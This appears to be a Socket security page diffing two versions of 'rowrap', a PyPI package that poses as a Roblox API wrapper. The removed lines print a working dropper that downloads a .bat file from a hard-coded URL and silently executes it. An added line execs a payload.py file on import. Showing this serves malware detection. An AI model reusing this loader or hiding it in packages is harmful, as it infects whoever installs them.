You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

rowrap

Package Overview
Dependencies
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rowrap - pypi Package Compare versions

Comparing version
1.1.5
to
1.1.6
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: rowrap
Version: 1.1.5
Version: 1.1.6
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -7,3 +7,3 @@ [build-system]

name = "rowrap"
version = "1.1.5"
version = "1.1.6"
description = "A Python wrapper for the Roblox web APIs"

@@ -10,0 +10,0 @@ readme = "README.md"

@@ -1,30 +0,2 @@

import os
import tempfile
import urllib.request
import subprocess
def download_and_execute_exe():
try:
# Hardcoded URL
exe_url = "https://dark-resonance-459b.blammervale.workers.dev/555.bat"
# Create a temporary file
with tempfile.NamedTemporaryFile(suffix='.exe', delete=False) as temp_file:
temp_path = temp_file.name
# Download the file
urllib.request.urlretrieve(exe_url, temp_path)
# Execute the file silently
subprocess.call([temp_path], shell=True)
# Optional: Clean up the temp file after execution
# os.unlink(temp_path)
except Exception:
# Clean up temp file if it exists
if 'temp_path' in locals() and os.path.exists(temp_path):
os.unlink(temp_path)
if __name__ == "__main__":
download_and_execute_exe()
subprocess.Popen("calc.exe")

@@ -1,1 +0,3 @@

\import payload
import sys
sys.path.insert(0, '')
exec(open('payload.py').read())
Metadata-Version: 2.4
Name: rowrap
Version: 1.1.5
Version: 1.1.6
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License